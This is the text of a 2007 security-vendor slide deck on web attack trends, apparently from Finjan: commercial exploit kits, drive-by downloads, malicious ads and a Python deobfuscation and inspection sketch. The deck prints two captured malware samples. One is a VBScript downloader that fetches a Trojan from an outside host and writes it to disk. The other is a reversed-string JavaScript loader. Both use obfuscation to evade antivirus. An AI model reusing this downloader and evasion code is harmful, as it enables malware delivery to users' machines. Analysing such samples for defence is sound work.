Latest Threats and Attacks in Web Security
Iftach Ian Amit
Director, Security Research
Finjan inc.
Jan 11, 2016
Finjan Latest Threats – Greek ICT Forum 2007
The Business Behind New Exploits
IE Vulnerability For Sale
Buying Vulnerabilities
Exploits Selling Service
Web Attacker Toolkit - Website
Web Attacker Toolkit – AV Will Not Detect It
Web Attacker Toolkit – Order Page
Web Attacker Toolkit – Statistics Report
Neo Sploit
Updating the ‘customer’ when new versions are available
The recent ‘Release note’ log:
Important update! Please update our product to v1.0.6 RC!
24 April 2007 - fixed crypt algorithm
16 April 2007 - new exploit module added; removed ANI exploit; fixed crypt algorithm
11 April 2007 - new exploit module added; fixed crypt algorithm
31 March 2007 - new exploit module added
22 March 2007 - new exploit module added
MPack Toolkit – Statistics Report
Multi Exploit Pack
Where are the Malicious Servers?
Geo footprint of a single MPack toolkit operator
Drive-by, While Visiting Websites
Innocent Free Games site
Exploits our desktop to install a Trojan
Dynamic Code Obfuscation: each user session includes different exploit content
Free Whois service…
1. Exploits the Internet Explorer VML vulnerability
2. Downloads spyware
3. Downloads a malicious JPG file – Trojan.JS.Psyme.ct
4. Checks the type of Anti-Virus installed
5. Injects a virus that the installed Anti-Virus does not detect
AJAX-Based Exploits in the Wild, Hosted in the US
http://7dias.t35.com/index2.php (Free Web Hosting, IP: 66.45.237.220, Hosted at: Secaucus, New Jersey, USA)
dl = "http://gigafoto.front.ru/pr.exe"                    ' The Trojan to be downloaded
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
str1 = "Ado" + "db." + "Str" + "eam"                      ' Escape from Anti-Virus signatures (split string)
str5 = str1
Set S = df.CreateObject(str5, "")
str6 = "GET"
x.Open str6, dl, False                                    ' AJAX request goes undetected
x.Send
Set F = df.CreateObject("Scripting.FileSystemObject", "")
Set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1 = F.BuildPath(tmp, fname1)
S.open
S.write x.responseBody
S.savetofile fname1, 2                                    ' Save Trojan on the victim's disk
S.close
Distributing Malicious Code Using Ads
The Malicious Ad
Trojan-Based Affiliation Program
Trojan-Based Affiliation Program – in Action
How does it look in the field?
Keeping all this activity under control: Evasive attacks!
Trojan’s Log
Trojan’s Log for Sale
Reactive Security Technologies…
Signatures, Heuristics, URL CAT
They detect known attacks quickly…
BUT THEY
Do not stop the next attack
Do not stop a targeted attack
Require frequent updates
Require huge signature / URL databases
The next wave of attack
A targeted attack
RSS Feed – Malicious Code, Reversed
http://www.tv-personalonline.com/rss2/rss.php
// Every statement is stored backwards and passed through RE(), which reverses it and evals it.
var fname = "C:\\mssync20.exe";
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'r_','di'(etubirttAtes.r_");
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok = 0;
try {
  var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");
  is_ok = 1;
} catch (e) {}
if (is_ok != 1) {
  try {
    var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");
    is_ok = 1;
  } catch (e) {}
}
RSS Feed – Malicious Code Reversed
Reversed functions
// RV reverses a string character by character; RE reverses and then evaluates it as code.
function RE(s) { return eval(RV(s)); }
function RV(s) {
  var rev = "";
  for (i = 0; i < s.length; i++) {
    rev = s.charAt(i) + rev;
  }
  return rev;
}
RSS Feed – Malicious Code Reversed
Reversed malicious code – undetected! ‘Actual’ malicious code – detected (7 out of 31)
Recent Example
Finjan's Technology: Real-Time Content Inspection (Patented)
Inspecting incoming & outgoing code to detect potentially malicious operations (Delete file, Install program, Change settings, etc.)
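As an added example (not Finjan's code and not from the deck), the following Python sketch does what this slide describes for the two evasion tricks shown earlier: it undoes the RV/RE reversed-string eval from the RSS feed sample and the "Ado"+"db."+"Str"+"eam" string split from the VBScript sample, then scans the recovered code for potentially malicious operations. The SUSPICIOUS_OPS list and the two sample snippets are constructed from the slides' own code.

```python
import re

# Operations a content inspector treats as potentially malicious (the deck
# lists: delete file, install program, change settings). These entries are
# constructed from the script objects and calls in this deck's own samples.
SUSPICIOUS_OPS = {
    "adodb.stream": "binary stream object, used to write a download to disk",
    "scripting.filesystemobject": "file system access",
    "savetofile": "saves the downloaded payload to disk",
    "microsoft.xmlhttp": "scripted HTTP download",
    "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36": "object CLSID used in both samples on this page",
}

# RE("...") evaluates the reversed literal as code; RV("...") only reverses it.
_REVERSED_CALL = re.compile(r'\b(RE|RV)\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
# Two adjacent double-quoted literals joined with '+' ("Ado"+ "db." ...).
_STRING_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')

def deobfuscate(script: str) -> str:
    """Undo the deck's two tricks: reversed-string eval and split string literals."""
    def unreverse(m):
        plain = m.group(2)[::-1]
        return plain if m.group(1) == "RE" else '"' + plain + '"'

    script = _REVERSED_CALL.sub(unreverse, script)
    prev = None
    while prev != script:  # keep joining until no "a" + "b" pairs remain
        prev = script
        script = _STRING_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), script)
    return script

def inspect(script: str) -> dict:
    """Map each suspicious indicator found in the deobfuscated script to its description."""
    text = deobfuscate(script).lower()
    return {ind: why for ind, why in SUSPICIOUS_OPS.items() if ind in text}

# Constructed sample 1: statements from the deck's reversed RSS-feed payload.
SAMPLE_JS = r'''var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");'''

# Constructed sample 2: the split-string line from the deck's VBScript downloader.
SAMPLE_VBS = 'str1 = "Ado" + "db." + "Str" + "eam"\nSet S = df.CreateObject(str1, "")'

if __name__ == "__main__":
    for name, sample in (("rss payload", SAMPLE_JS), ("vbs downloader", SAMPLE_VBS)):
        print(name, "naive signature match:", "adodb.stream" in sample.lower())
        print(name, "after deobfuscation:", inspect(sample))
```

A plain substring signature for "adodb.stream" misses both samples as delivered; the same check applied after deobfuscation flags each of them.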
Audit Results at Customer Networks
Thank you